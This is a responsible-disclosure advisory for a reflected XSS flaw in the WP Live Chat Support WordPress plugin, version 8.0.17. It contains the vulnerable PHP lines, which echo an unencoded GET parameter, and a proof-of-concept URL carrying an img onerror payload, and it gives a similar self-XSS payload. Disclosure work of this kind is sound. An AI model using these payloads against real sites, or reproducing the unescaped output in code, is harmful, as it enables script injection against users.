WP Live Chat Support 8.0.17 - Reflected XSS (WordPress Plugin)

• Vulnerability: XSS
• Affected Software: WP Live Chat Support (60,000+ active installations)
• Affected Version: 8.0.17
• Patched Version: 8.0.18
• Risk: Medium
• Vendor Contacted: 10/31/2018
• Vendor Fix: 11/01/2018
• Public Disclosure: 02/05/2019

CVSS

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

The WP Live Chat Support WordPress plugin is vulnerable to reflected XSS as it echoes the term parameter without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application in the name of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read data which the user can access.

Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=wplivechat-menu-gdpr-page&term='"><img+src%3Dx+onerror%3Dalert(1)>

Code

wp-live-chat-support/modules/gdpr.php:                      <a class='button' href='?page=wplivechat-menu-gdpr-page&term=<?php echo($_GET["term"]); ?>&action=delete&filter=<?php echo $action_action_filter; ?>&id=<?php echo $cid; ?>'><?php echo $delete_button_text; ?></a>
wp-live-chat-support/modules/gdpr.php:                      <a class='button button-primary' href='?page=wplivechat-menu-gdpr-page&term=<?php echo($_GET["term"]); ?>&action=download&filter=<?php echo $action_action_filter; ?>&id=<?php echo $cid; ?>'><?php echo $download_button_text; ?></a>

Further

In addition to the reflected XSS issue, there is a self-XSS issue in the client-side input form, which can be triggered by entering '"><img src=x onerror=alert(1)>. Self-XSS may be exploitable via social engineering or Clickjacking.

Timeline

• 10/31/2018 Requested email address via contact form
• 10/31/2018 Vendor responds, advisory sent
• 11/01/2018 Vendor releases fix
• 02/05/2019 Confirmed fix & Disclosure